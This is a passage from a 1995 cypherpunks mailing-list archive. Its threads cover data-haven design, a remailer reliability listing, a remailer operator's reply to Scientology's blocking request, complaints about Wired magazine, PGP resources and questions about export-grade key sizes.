match access tokens against files - Dave has the advantage of not even knowing the access token (which the retrieve-with-K method has) as well as not letting Dave decrypt. Using user-selected keys instead of message hashes is obviously a lot faster, since Dave doesn't have to calculate them, and makes it a bit easier for Alice to memorize the keys instead of storing them, but it requires more Syntax in the requests, and increases the chances of wimpy keys and especially collisions (which essentially never happen in hash-based systems, but are more common if people want to use keys like "Secret Plans".) And Alice can always store the hashes encrypted and stegoed, or store an index file on the datahaven and give her friends the access tokens for that instead of her whole collection. Hashes are also safer for Dave if Alice is compromised or spam is a problem, since he doesn't have to respond to requests for "spam1.gif" or "Nuclear Narcoterrorist KiddyPorn Monthly" or "Windows_for_95.c", which is riskier than requests for 0x402930be89a9c901. Bill From perry at imsi.com Mon Jan 16 03:24:02 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 16 Jan 95 03:24:02 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com> Message-ID: <9501161122.AA05896@snark.imsi.com> Timothy C. May says: > I'm not sure what Perry's not having heard of Jude Milhon is supposed > to mean, or how "Wired" interviewing her is "another example of the > continuing decay," etc. > > In any case, Jude Milhon has been active in the hacker-writer > community, going back to the 1970s. Sorry. Everyone seems to be assuring me that I should know her and that she's a longtime friend of Eric's, but I must admit that I've no memory of anything she's done. I believe people who say she's the origin of the term "cypherpunk", but I must admit to still having no real knowledge of who this person is. In any case, I apologize for my ignorance and will try be on less of a hair trigger in the future. However, following a long stream of Wired interviews of bizarrely marginal community members, I simply assumed this was Yet Another. > Anyone who professes to be "disappointed" by "Wired" was clearly taken > in by their hype. I'm disappointed by them because they once used to care about getting facts in articles right and about discussing meaningful issues, and now they don't. They used to be a cross between the Economist and Mondo 2000, and now they are just Mondo 2001. When you try to count inaccuracies on the average page, you run out of interest in continuing the exercise before you run out of errors. They also used to have a point of view. They also used to have substantive articles, and now they have cover stories on "Zippies!" I'm not renewing my subscription. Perry From raph at CS.Berkeley.EDU Mon Jan 16 06:49:49 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 16 Jan 95 06:49:49 PST Subject: List of reliable remailers Message-ID: <199501161450.GAA11071@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 16 Jan 95 6:00:02 PST remailer email address history latency uptime ----------------------------------------------------------------------- rahul homer at rahul.net ***********# 3:32 99.99% bsu-cs nowhere at bsu-cs.bsu.edu ***+#*****+# 8:27 99.86% ideath remailer at ideath.goldenbear.com ---------+-- 2:11:08 99.84% penet anon at anon.penet.fi ************ 35:48 99.99% nately remailer at nately.ucsd.edu +++ -+-+++++ 1:08:44 99.76% mix mixmaster at nately.ucsd.edu -++ .++++++* 1:43:39 99.75% q q at c2.org ++---+++++- 1:16:03 99.74% vox remail at vox.xs4all.nl --------- - 9:46:45 99.99% soda remailer at csua.berkeley.edu .... ..-..- 8:32:46 99.41% alumni hal at alumni.caltech.edu +**** -++-*# 1:52:49 99.20% portal hfinney at shell.portal.com #*#** -##- * 1:23:04 99.17% extropia remail at extropia.wimsey.com ++++++++++++ 3:15:35 97.19% rebma remailer at rebma.mn.org _-_.---_..-* 21:48:17 90.00% desert remail at desert.xs4all.nl ----.-_.-- 22:09:02 86.57% usura usura at replay.com -+**+ +- ++ 33:32 84.49% xs4all remailer at xs4all.nl -+**+++- ** 22:59 79.87% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From jml at wizard.synapse.net Mon Jan 16 07:27:26 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Mon, 16 Jan 95 07:27:26 PST Subject: bug in remailers Message-ID: <199501161526.KAA28093@sentinel.synapse.net> > Litsen, you mentioned that you were getting >the same problem with other remailers. That was because you >were mailing through my remailer to them or from them, right? I sure >hope so. I would hate to think my code effected others remailers! :) > Homer Yah, I'm 99% sure that it what happenned. I'll be testing that today. I've sent a few test messages to your remailer and everythnig came back just fine. The trouble with other remailers is that it can take as much as a full day before a message gets delivered. I'll get back to you. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR tAZ3aXphcmQ= =syn9 -----END PGP PUBLIC KEY BLOCK----- From danisch at ira.uka.de Mon Jan 16 08:17:53 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 16 Jan 95 08:17:53 PST Subject: Scientology [!] Message-ID: <9501161616.AA06028@elysion.iaks.ira.uka.de> > -----BEGIN PGP SIGNED MESSAGE----- > > 1/15/95 > > TO: THOMAS M. SMALL > COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE > PUBLICATIONS, INC. > > FROM: Lance Cottrell > Operator of remailer at nately and mixmaster at nately My pgp says: Bad signature Does this message come from Lance Cottrell or from Scientology? > I am willing to comply with your request. Oh. If this is true (is it?) and other remailer operators do the same, there will be no anonymous criticism of the Thetans any more. An non-anonymous criticism of this "church" is said to be a thing of a special kind. Mmmh, Hadmut From adwestro at ouray.Denver.Colorado.EDU Mon Jan 16 09:15:48 1995 From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope) Date: Mon, 16 Jan 95 09:15:48 PST Subject: Scientology [!] In-Reply-To: <9501161616.AA06028@elysion.iaks.ira.uka.de> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 16 Jan, danisch at ira.uka.de (Hadmut Danisch) wrote: > > FROM: Lance Cottrell > > Operator of remailer at nately and mixmaster at nately [...--aw] > > I am willing to comply with your request. > Oh. If this is true (is it?) and other remailer operators do the > same, there will be no anonymous criticism of the Thetans any more. I don't have the text of Lance's response available at the moment, but I believe he clearly stated that he would not block remailings to the mail-to-news gateways. I.e., while he's complying with the letter of the Co$ request, his remailers can still be used effectively for anonymous posting. Other than a slight delay in posting, I can't think of any inconvenience this imposes on those wishing to post anonymously. I thought it was an excellent response. /* nudge, wink, etc. :-) */ Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxqooVRRFMq4NZY5AQGZzQP9HMVer1sD3dTnY/VUYz3CVTeCR+5ICfcR kG60dHeP7s/qKBHTF1qTx1hUGExqnC6DOBnvkh6wjhohcfjyGrQiQtyyhRQX55NH FUtR3gjJH0lLxB4Qr1RI3mempuXL4H5G/aQoqz1rxHN2lGUFx3YBD+2zmAqPqFIZ KMgL0vx6kTc= =j7er -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Jan 16 10:01:22 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 16 Jan 95 10:01:22 PST Subject: Scientology (fwd) Message-ID: <199501161802.NAA17787@ducie.cs.umass.edu> This is the copy that was sent to the remailer operators' list. Note that the start of "FROM:" is corrupted, and there's some odd line breaking. I'm guessing that's the reason the signature doesn't check (for me, either). -L. Futplex McCarthy Forwarded message: > From remailer-operators-owner at c2.org Sun Jan 15 15:08:56 1995 > To: Remailer-Operators at c2.org > Message-Id: > Date: Sun, 15 Jan 1995 11:56:48 -0800 > From: lcottrell at popmail.ucsd.edu (Lance Cottrell) > Subject: Re: Scientology > > -----BEGIN PGP SIGNED MESSAGE----- > > 1/15/95=20 > > TO: THOMAS M. SMALL > COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE > PUBLICATIONS, INC. > > =46ROM: Lance Cottrell > Operator of remailer at nately and mixmaster at nately > > In response to your email of January 3, 1995 requesting that I block= > anonymous posting to the Internet news groups alt.clearing.technology and a= > lt.religion.scientology. > > Although my remailers have always supported direct posting to news groups,= > this feature has never been advertised or supported. Since direct posting= > from my remailers is never used, I am willing to comply with your request.= > Posting to alt.clearing.technology and alt.religion.scientology has been bl= > ocked. > > By this action I do not admit to any wrongdoing on my part, nor do I wish to= > imply any wrongdoing on the part of any users of my remailers. I am merely= > turning of a feature that I never intended to be used. > > By design it is not possible to prevent users from using my remailers to= > send a message to another computer to be posted. I can not, and will not,= > block mail to other remailers or to mail-to-news gateways. > > Yours, > Lance M. Cottrell > > CC: Cypherpunks at toad.com, remailer-operators at c2.org, > alt.privacy.anon-server, alt.privacy, > alt.religion.scientology, alt.clearing.technology > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM > Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3 > ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94 > EH/mStSfdJY=3D > =3DUgN1 > -----END PGP SIGNATURE----- > > > From tcmay at netcom.com Mon Jan 16 10:27:25 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 16 Jan 95 10:27:25 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501161122.AA05896@snark.imsi.com> Message-ID: <199501161819.KAA14478@netcom19.netcom.com> Perry E. Metzger wrote: > Sorry. Everyone seems to be assuring me that I should know her and > that she's a longtime friend of Eric's, but I must admit that I've > no memory of anything she's done. I believe people who say she's the > origin of the term "cypherpunk", but I must admit to still having no > real knowledge of who this person is. > > In any case, I apologize for my ignorance and will try be on less of a > hair trigger in the future. However, following a long stream of Wired > interviews of bizarrely marginal community members, I simply assumed > this was Yet Another. And I apologize to Perry for not being even more elliptic in my questioning of his language. It's jus that Jude is pretty well known out here, at least by the group that was at the early meetings, and so.... One thing I've found is that the electronic age has made me more careful about insulting specific people. The Kibo Effect, call it. (Hi, Kibo!) General insults, or political statements, are of course kosher, but making any kind of snide remarks about Joe Foobar, for example, will often result in these comments being fed to the at person. (I recently made some comments here on this list about a public Net person, whom I do not believe is or was subscribed...a few days later I got a note from this person objecting to my characterization of his views! I am assuming someone forwarded the traffic to him.) So, if I see a "marginal" person interviewed by "Wired," I am circumspect about commenting on them...they might be on the list, they might actually be doing something important, etc. (Like that unknown guy "Andreeson," or somesuch...I don't have any idea what he's done, and I never heard of him before last year, but all the hype-zines are putting him on their covers, so he must be doing something interesting :).) Anyway, many of the folks "Wired" and the other hype-zines interview are indeed strange and marginal. To be expected. There are only so many of the standard "talking heads" that can be interviewed (the stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.). Frankly, I'd rather see a story on "Zippies," about which I'd heard nothing substantive before, than Yet Another Ted Nelson Story, about which I've heard entirely too much over the past decade. (Not to insult Ted--Hi, Ted!--but there are only so many ways to tell the Xanadu story...time for new approaches.) I know some folks in the crypto/PGP community who were quite miffed that such "marginal" folks as Eric Hughes, John Gilmore, and I were featured on the cover of "Wired" 1.2 two years ago...they naturally saw themselves as being more worthy, as perhaps they were....such is life. The "credit assignment problem" in evolution and genetic programming remains a tough one. Finally, "Wired" is still mixing stories about flakes with seminal articles, such as the one on "FinCEN" a while back. That makes it still worth looking at, at least to me. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From hayden at krypton.mankato.msus.edu Mon Jan 16 10:36:41 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Mon, 16 Jan 95 10:36:41 PST Subject: REQUEST: Privacy/Free Speech URLs Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On the request of a few law-related professors and other faculty, I'm trying to put together a web page that brings together resources from all over the net that are related to issues of free speech, privacy, libel, censorship, etc. If you have a few URLS with materials related to the above, I'd appreciate it if you could drop them in an emailee to me. Basically, any URL that ends up pointing to issues of rights and rules on the net, and possibly related software (such as PGP and the like). Thanks much :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxq8aTokqlyVGmCFAQGPXwP+LpyRgw+fuV4HXzt3ObGyu4ME8XsgBbRz Z2yyhVsbeK9DnhJuYPRiaHGjOmO3rl+9qmjisxbmQA8YkmKIyIGB8ViP7RKLoUlg vCUzr00AbQHc9SZKuuQCyOSHirDNZfc/3A92U1MsEXZl/gACoNxOq3+uSqyE9LWu bQrXW4xbl+0= =2H+w -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> I am Pentium of Borg \/ Finger for PGP Public Key <=> you will be approximated From perry at imsi.com Mon Jan 16 11:04:29 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 16 Jan 95 11:04:29 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com> Message-ID: <9501161903.AA07088@snark.imsi.com> Timothy C. May says: > One thing I've found is that the electronic age has made me more > careful about insulting specific people. The Kibo Effect, call it. > (Hi, Kibo!) I wasn't insulting Jude (whoever she is; I don't know her and have no reason to have an opinion on her); I was insulting "Wired". > Frankly, I'd rather see a story on "Zippies," about which I'd heard > nothing substantive before, than Yet Another Ted Nelson Story, about > which I've heard entirely too much over the past decade. On the other hand, "Wired" used to interview people who were fairly unknown but important -- there are an endless supply of such people. When was the last time you saw an interview with someone like Rick Adams, for example? He's not necessarily the *most* important person on the planet, but being the proprietor of a company that runs a good fraction of the world's internet connectivity and just got partially bought by Microsoft, he's pretty important in a lot of ways, and I legitimately know little about him. How about an article on the economics of cellphone fraud -- a multi-billion dollar industry created by the NSA and its desire to stop encryption from being used. Lots of cool stuff out there to report on -- no need to do fashion-fluff. > I know some folks in the crypto/PGP community who were quite miffed > that such "marginal" folks as Eric Hughes, John Gilmore, and I were > featured on the cover of "Wired" 1.2 two years ago... Two years ago, the average article in "Wired" was worth reading -- informative, cutting edge, accurate, and about something important. Today, the articles are more likely to be about weird hangers on from the cultural fringes mumbling weird deconstructionist ravings about obscure topics. I've found an average of only one decent article per issue lately -- and I have no doubt they'll fix that soon. Perry From cactus at seabsd.hks.net Mon Jan 16 11:59:00 1995 From: cactus at seabsd.hks.net (Gone Fission) Date: Mon, 16 Jan 95 11:59:00 PST Subject: Crypto functions In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com> Message-ID: <199501162004.PAA21196@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <9501161145.ZM27648 at wiley.sydney.sgi.com>, Ian Farquhar wrote: >Well, I wasn't the original person who said that they wouldn't use it, >but I would agree. It's too new. It looks very good so far, but until it's >been through a lot more analysis than Blowfish has received so far, it is >too much of an unknown quantity. That's okay. So's my GUCAPI code (suggestions of a better name are quite welcome. I'm considering changing the name to the Hastur Crypto Toolkit, purely on aesthetics). BTW, pointers to public domain code for each of these ciphers/hashes would be reatly appreciated. The crypto part of the library is really going to just be a collection of what's already available from elsewhere; the main work is in genericizing the IO and the key management functions and in making life difficult for people who don't follow the interface properly. Other than that, the only other real work is getting a reasonably portable source of random numbers working as a default random source. I'll also be distributing an ITAR-friendly "bones" version with instructions on how to add ciphers. Are PRNGs like BBS covered by ITAR? - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxqVvxNhgovrPB7dAQGStwP7B9+lX/2KVxs6Zq6u4TNENGFJ6aW4Sydq 7RgJJo5YzKpyQFvzRB1FYYLWKJNIaMbPXrm6mLPLXzj7dShWDngQh3m+K+VP3qU3 IEtNsovJuXqvxWYzA4uH4c1SCAV1DDkjlAjx/Ix884cXbRmEJjpnfiUCrItEf42B Nz3cwcILX4o= =M18o - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxrRGSoZzwIn1bdtAQGfUAF9F0XSAuKnH+jJopAz02NYJmvA271oGq+A 7YSny6PSNLLK5wncl6lnbM0Rr3eQ58cf =8qA2 -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Mon Jan 16 12:10:32 1995 From: cactus at seabsd.hks.net (Gone Fission) Date: Mon, 16 Jan 95 12:10:32 PST Subject: Pgp where? Message-ID: <199501162015.PAA21338@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article , Dave Del Torto wrote: >FYI, I keep the most recent version of Mike Johnson's excellent guide on >where to find PGP in: > > ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt I also have an infobot on pgp-faq at hks.net. Sending mail there will get you a fast autoresponse with a reasonably recent version of the same FAQ. >Send email to if you have further questions. And, I'll remind everyone that we need volunteers for the pgp-help mailing list (Dave's on it). It's important that we be able to identify what the worst barriers to PGP use are and the best way to do that is to answer folks' questions. Send mail to pgp-help-request at hks.net to be added. Thanks, - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxqYhRNhgovrPB7dAQH+4AP/RsK7SdY+KVmxuEn3JU8INnK0XnAsi3et jw5jtTfcFJmIKN0u1PmcFeeOwbrgqahzPvOpTJvXQHA73zi94XLGbAR5hrDRAD7N Sfm/4h6lngQV2tzAephZg0J5aV3X6wcCrhd3h3sG01QeaT8YWBzmeRKTXBpAkpWw Nf7opd5EXhM= =t88d - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxrTxSoZzwIn1bdtAQGTzgGAlbPDZqyvoI+5nSZS8NaAnXL5iUXIVRip bu3AM/mGFK/3Y0AsfKnhr4b3ZnZP1KXS =4gk2 -----END PGP SIGNATURE----- From hfinney at shell.portal.com Mon Jan 16 12:24:53 1995 From: hfinney at shell.portal.com (Hal) Date: Mon, 16 Jan 95 12:24:53 PST Subject: Jude Milhon in WIRED Message-ID: <199501162024.MAA21177@jobe.shell.portal.com> From: tcmay at netcom.com (Timothy C. May) > General insults, or political statements, are of course kosher, but > making any kind of snide remarks about Joe Foobar, for example, will > often result in these comments being fed to the at person. (I recently > made some comments here on this list about a public Net person, whom I > do not believe is or was subscribed...a few days later I got a > note from this person objecting to my characterization of his views! I > am assuming someone forwarded the traffic to him.) I felt the same way recently. I had commented here about elec cash prodigy Stefan Brands being among those not getting into the DigiCash demo, it got cross-posted to www-buyinfo (which is read by DigiCash people) and led to a big political stink that may have set back relations between Brands and Chaum and therefore the prospects for high-quality digital cash. I really regretted my words as it was certainly not my intention to stir up bad blood. I still tend to think of this list as a relatively private place to make comments "just among friends", unlike more public venues which feed into a wider cross-section of views and where I try to be much more circumspect. Hal From aba at dcs.exeter.ac.uk Mon Jan 16 13:10:55 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Mon, 16 Jan 95 13:10:55 PST Subject: request for factorising code Message-ID: <6482.9501161922@exe.dcs.exeter.ac.uk> -----BEGIN PGP SIGNED MESSAGE----- I have had a look at the exported version of Netscape's WWW browser which has support for secure transfer of info, and it says it uses RSA keys limited to 40 (not sure whether this is decimal digits or bits). This is the broken version for export, I am not sure what the non-crippled version uses. I would like to have a go at factorising a number of 40 digits to get a feel for how secure this system is. I suspect not very secure even 40 digits is pretty pitiful for an RSA key size 40 bits would be a joke. I would like to get a feel for how long it takes to factorise a 40 digit number. Does anyone have source code for factorising large numbers. I have code to generate the RSA key pairs and modulus, what I am looking for is code to factorise a number using one of the better algorithms (quadratic sieve, etc.). Adam -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAiwUXUEAAAEEAJnWEHE3juLAyMnEt3hrID3t8tblJvJPfoPz4Plg+2a5y4HA TonXBomkhm8hrRu1umruUUaeW1mxIbpvP413a2JyU7pdyfyoFVpWW5iT9pXYOgSW 65d+5GWe4g4PLrSbJZPBFIezd8xddnx5+5hbRk1K6UpfReQuOynIuJ1VakpnAAUT tB9BZGFtIEJhY2sgPEEuQmFja0BleGV0ZXIuYWMudWs+ =pRe7 -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUALxrGhSnIuJ1VakpnAQHzbAP/Q00RZan2rdMrIYzM3Dp4+620DFGoe0zi bRMvLUlKUuPPfdc5PYh/l7cxXwnj6/ARP6QUCyxlHwS/vKxHNJyhIcgna2yIBQGA NtCKZjZNdEYII9/taC4BXc7nTIvJKuz0EgXVSJwbUXgBjuMFA/ZGOrKr1SFcyLbP qMER2rgg5VM= =AJwi -----END PGP SIGNATURE----- From eric at remailer.net Mon Jan 16 13:21:10 1995 From: eric at remailer.net (Eric Hughes) Date: Mon, 16 Jan 95 13:21:10 PST Subject: request for factorising code In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk> Message-ID: <199501162121.NAA05239@largo.remailer.net> From: aba at atlas.ex.ac.uk I have had a look at the exported version of Netscape's WWW browser which has support for secure transfer of info, and it says it uses RSA keys limited to 40 That's RSADSI's RC4 cipher, not the RSA public key cipher. Eric From Ben.Goren at asu.edu Mon Jan 16 13:33:31 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Mon, 16 Jan 95 13:33:31 PST Subject: How do I know if its encrypted? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I think we're pretty well agreed that Dave's DataHaven can't ensure that files are encrypted without looking inside them at some point. It's a dilemma: Dave wants to be sure he can't read something, but the only way he can be sure is by reading it. But suppose that Dave's good friend Ender Trent decides to set up a new service, Ender Trent's Trusted Encryption. It's a simple job: people send files to Ender and he returns them encrypted and signed. Now, all Dave needs do is check Ender's signature before accepting a file. At no point does Dave ever decrypt or attempt to decrypt such a file. Ender offers encryption in many different forms. In the simplest, Alice sends the file to Ender, Ender generates a random key, encrypts the file, and sends both back to Alice. Almost as simple, Ender uses the hash of the original file as the key. Presumably, Alice already knows the hash and so Ender doesn't send that back. Alice could supply a public PGP (or other asymmetrical algorithm) key with the file and Ender uses that. If Alice is a frequent customer and likes this method, she might register the key with Ender. Lastly, Alice might want to supply a symmetric key of her own. Because Ender wants to protect people like Dave, he can either print a warning that the key used for encryption might not be secure, or run a password-cracking algorithm on it, or both. Because of the extra effort and reduced security, Ender might not want to offer this, or charge an arm and a leg for it. And Dave might not be willing to accept such files, anyway. How is it better to have Ender do all this rather than Dave? Essentially, it splits the risk. Dave never sees the files, and therefore can't be responsible for their contents. Nor could he make sense out of them, even if he tried really, really hard. He could operate his data haven in all but the most repressive parts of the world. Ender's risk is slim to none. Were he to be held accountable for files he encrypts, public notaries would likewise have to be held accountable for everything they notarize. I don't see that as a problem. Dave might wish to offer an encryption service, as Ender might want to offer a data haven, but, if they're smart, they won't accept files that they themselves encrypted. Ender's encryption need not only be for data havens, of course. Nervous remailer operators might want proof of encryption. Escrow services will likely like Ender. And probably more. If there is a demand for a trusted encryption service, I'll create one after the second trumpet audition for the Oregon Symphony on the first of the month. That's the main reason I'm signing this--to hold myself to it. b& -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEUAwUBLxrj5a7gd9aHWwWVAQH2Hgf0CF+0CIMWiK7d52Gaa8fPpMQy+qAYOBj+ MxJPZJpwxLEzmdT8n+dWjz2+0uPbIXXYa8yEM86UeV9++BzNM7WkOr5tezUuUrYa aM+I4yWJEz/oUpURxi4tt1Jmxn4F0IGQENBweIw+lsgU/TyNweCerKoShLpP4zca iZr1HtkK/7KdEi/wmADtfI6aUHytRyMXYvwKhKiy23eAFyNtZgAz4i77p2Kw6iM6 aTGsQQVjda6AYcVlIcLAJN8v+pQV+RGKA4FGACsxEGHDCQvFd3/WvCD4pupPm80E 9QLhQ2zLIjAkSmkO9flndXq6TOcCtMd3f6u/oGCx1EHKUTdP8nbg =svFy -----END PGP SIGNATURE----- -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059. From warlord at MIT.EDU Mon Jan 16 13:42:58 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 16 Jan 95 13:42:58 PST Subject: request for factorising code In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk> Message-ID: <9501162142.AA17465@mostly-harmless.MIT.EDU> I suspect that this is not an RSA keysize, but an RC4 keysize. Does it specify 40bit RSA keys? Or does it say "40 bit cryptographic key"? I suspect something closer to the latter, in which case I highly doubt it is an RSA key. A 40-bit RSA key can be broken in seconds. a 40-digit RSA key will take a few days. -derek From jml at wizard.synapse.net Mon Jan 16 14:00:17 1995 From: jml at wizard.synapse.net (jml at wizard.synapse.net) Date: Mon, 16 Jan 95 14:00:17 PST Subject: REQUEST: Privacy/Free Speech URLs Message-ID: <199501162159.QAA09934@sentinel.synapse.net> >On the request of a few law-related professors and other faculty, I'm >trying to put together a web page that brings together resources from all >over the net that are related to issues of free speech, privacy, libel, >censorship, etc. > >If you have a few URLS with materials related to the above, I'd >appreciate it if you could drop them in an emailee to me. Basically, any >URL that ends up pointing to issues of rights and rules on the net, and >possibly related software (such as PGP and the like). > >Thanks much :-) Check out Vince Cate's Cryptorebel/Cypherpunk Page at: ftp://furmint.nectar.cs.cmu.edu/security/README.html It has just about everything with links to other sites that have links to other sites that have links to.... it's a web thing. :-) *********************************************** jml at wizard.synapse.net PGP encrypted mail preferred. I might disagree totally with what you say but I'll defend your right to say it to the death. *********************************************** From jya at pipeline.com Mon Jan 16 14:30:25 1995 From: jya at pipeline.com (John Young) Date: Mon, 16 Jan 95 14:30:25 PST Subject: US News on Policing Cyberspace Message-ID: <199501162229.RAA29483@pipe1.pipeline.com> US News of January 23 has a cover story on "policing cybersapce", another drumbeat about "the growing threats to your privacy and property in the information age." Not much new for this group except to enjoy another Spielberg gremlin of Jekyll and Hyde cryptography, fearful remailers, slippery digicash, stolen services and personal data, smuggling, terrorism, child pornography, Tennessee BBS, "cybercops" and such. Featuring the FBI's Kallstrom and Tafoya and FLETC and Financial Fraud Institute and Clipper and protective wiretaps, with supporting roles for Kevin Mitnick, Bruce Schneier, Mike Godwin, Marc Rotenberg, John Perry Barlow, Esther Dyson, Robert Corn-Revere. And, a cartoon on how to teach parents fear of the Net for their children. Cypherpunk is not sited, I think, or is it steganoed?. From Jaeson.M.Engle at josaiah.sewanee.edu Mon Jan 16 14:52:49 1995 From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden) Date: Mon, 16 Jan 95 14:52:49 PST Subject: Longer than 1048 bit keys Message-ID: -----BEGIN PGP 